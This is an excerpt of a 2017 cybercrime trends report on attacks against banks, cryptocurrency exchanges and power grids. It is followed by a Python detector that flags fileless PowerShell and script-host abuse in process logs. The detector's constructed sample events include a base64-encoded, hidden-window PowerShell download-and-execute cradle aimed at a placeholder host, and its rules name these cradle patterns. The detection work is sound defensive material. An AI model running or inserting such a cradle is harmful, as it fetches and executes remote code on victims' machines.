- One possible sabotage scenario is trading on exchanges on behalf of the victim bank in order to influence exchange rates and cause losses. This can lead to snowball-style flash crashes as HFT trading algorithms respond to the fluctuations in exchange rates.
- Out of 22 new malicious programs used to steal funds, 20 (91%) were created and are controlled by Russian-speaking hackers.
- Phishing for banks and payment systems is automated and conducted in real time, which allows cybercriminals to bypass SMS confirmations for debiting money. On average, 10-15% of visitors to financial phishing websites enter their data.
- The total damage caused by targeted hacker attacks on the cryptocurrency industry amounts to more than $168 million, and the income from attacks on cryptocurrency exchanges varies from $1.5 million (Bitcurex) to $72 million (Bitfinex), while a successful attack on a bank brings criminals only about $1.5 million on average.
- Attacks on cryptocurrency exchanges are conducted in the same way as targeted attacks on banks, with similar or sometimes identical tools and tactics. For example, cybercriminals use fake IDs to obtain the victim’s SIM card, recover passwords and gain control over accounts in cryptocurrency services.
- The fact that attackers are “retargeting” popular banking Trojans such as TrickBot, Vawtrak, Qadars, Tinba and Marcher to collect logins and passwords of cryptocurrency users suggests that they have found a new niche and might shift their focus outside the traditional banking sector in the near future.
- Targeted attacks on cryptocurrency exchanges will be carried out not only by financially motivated hackers but by state-sponsored attackers as well.
The BlackEnergy group continues to attack financial and energy companies. The group uses new tools that allow remote terminal units (RTUs), the devices responsible for physically opening and closing circuits on the power grid, to be controlled remotely. Test attacks on power generating companies in the UK and Ireland were tracked in the summer of 2017.
HI-TECH CRIME MARKET ASSESSMENT
The growth in the number of attacks and the totals stolen is a significant indicator of hackers’ capabilities, which drive changes in their tactics and targets. The majority of attackers follow the money, and if they find more efficient and safer ways to earn it, they start investing in them, creating new tools, services, and attack schemes.
In Russia, the amount of losses caused by theft from legal entities is still in decline, but losses caused by Android banking Trojans are still increasing. The number of targeted attacks on banks and payment systems is on the rise, but hackers have earned the majority of their profits outside Russia, as we predicted last year.
After phishing attacks on bank clients and payment systems were fully automated, the amount of loss from this activity in Russia became very significant. Every day phishers attack many more users than banking Trojans do, but the net amount of loss is still smaller. However, because the scheme is so simple, an increasing number of criminals are starting to use it.
DEVELOPMENT OF HACKING TOOLS
- Fileless malware that uses malicious scripts to launch an attack is a new and currently the primary attack method. To slip under the radar, hackers use fileless software that exists only in RAM until the system is rebooted. At the same time, malicious PowerShell, VBS and PHP scripts help them to maintain persistence in the system and automate some stages of their attacks.
- NotPetya has demonstrated that creating a template can be enough to gain control over a corporate network. In the future, we should expect many scripted cyber-attacks as well as ready-made simple tools that can gain control over corporate domains automatically. If such tools are made publicly available or are sold among hackers, this can lead to an avalanche of growth in attacks on the corporate sector. We primarily expect more incidents involving ransomware, theft of confidential information and extortion for non-disclosure, money theft, and incidents of public exposure by non-financially motivated hackers.
- We expect malware developers to continue publishing the source code of their programs online, and to be more active in doing so. In addition, leaks published by The Shadow Brokers and similar organisations will also be immediately used for malware creation and improvement. This will give a powerful boost to the development of the cybercrime industry.
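The fileless-malware finding above is the one most directly actionable for a defender: the payload never touches disk, so detection has to come from process creation telemetry rather than file scanning. The script below is an added example, not code from the Group-IB report; it assumes a constructed, pipe-separated process log format (`timestamp|host|parent_image|image|command_line`) and made-up sample events. It flags the command-line traits that in-memory PowerShell and script-host abuse typically show (encoded commands, hidden windows, execution-policy bypass, download cradles, script hosts launched from user-writable directories, Office parents spawning script hosts) and decodes any `-EncodedCommand` payload so an analyst can see what was actually run.

```python
import base64
import re

# Constructed sample telemetry in "timestamp|host|parent_image|image|command_line" form.
# These are made-up events for the example, not records from any real incident.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')"
    .encode("utf-16le")).decode("ascii")

SAMPLE_LOG = [
    "2017-09-01T08:00:01|WS01|explorer.exe|powershell.exe|powershell.exe -NoProfile -Command Get-Service",
    f"2017-09-01T08:02:13|WS01|winword.exe|powershell.exe|powershell.exe -NoP -w hidden -enc {ENCODED_SAMPLE}",
    "2017-09-01T08:03:40|WS02|outlook.exe|wscript.exe|wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.vbs",
    "2017-09-01T08:05:02|SRV03|cmd.exe|powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

# PowerShell accepts unambiguous parameter prefixes (-e, -ec, -enc, -w, -ex ...),
# so the rules must match the abbreviations, not only the full parameter names.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
COMMAND_LINE_RULES = {
    "encoded_command": ENCODED_RE,
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden"),
    "execution_policy_bypass": re.compile(r"(?i)(?:^|\s)-ex(?:ecutionpolicy)?\s+bypass"),
    "download_cradle": re.compile(
        r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biex\b|invoke-expression"),
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE_DIR = re.compile(r"(?i)\\(?:temp|appdata|downloads|public)\\")


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64 / not UTF-16LE: leave it to the analyst rather than guess.
        return None


def analyse_line(line):
    """Parse one log line and return its fields plus the detection tags it triggered."""
    timestamp, host, parent, image, cmd = line.split("|", 4)
    tags = [tag for tag, rule in COMMAND_LINE_RULES.items() if rule.search(cmd)]
    decoded = decode_encoded_command(cmd)
    # The encoded blob hides the interesting strings; apply the cradle rule to the plaintext too.
    if decoded and COMMAND_LINE_RULES["download_cradle"].search(decoded):
        tags.append("download_cradle_in_decoded")
    if image.lower() in SCRIPT_HOSTS and USER_WRITABLE_DIR.search(cmd):
        tags.append("script_host_from_user_dir")
    if parent.lower() in OFFICE_PARENTS and image.lower() in SCRIPT_HOSTS | {"powershell.exe"}:
        tags.append("office_spawned_script_host")
    return {"timestamp": timestamp, "host": host, "parent": parent,
            "image": image, "tags": tags, "decoded": decoded}


def scan(lines):
    """Return the analysis records for every line that triggered at least one rule."""
    return [record for record in (analyse_line(line) for line in lines) if record["tags"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['host']} {hit['parent']} -> {hit['image']}: {', '.join(hit['tags'])}")
        if hit["decoded"]:
            print(f"    decoded: {hit['decoded']}")
```

Of the four constructed events, the plain `Get-Service` call triggers nothing, while the Word-spawned encoded one-liner, the `.vbs` run from a temp folder and the `-ExecutionPolicy Bypass` script each raise one or more tags. In practice the execution-policy rule on its own is noisy (legitimate administration scripts use it, as the fourth sample shows), so it belongs in a scoring scheme alongside the parent-process and encoding signals rather than as a standalone alert.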
The full version of Hi-Tech Crime Trends 2017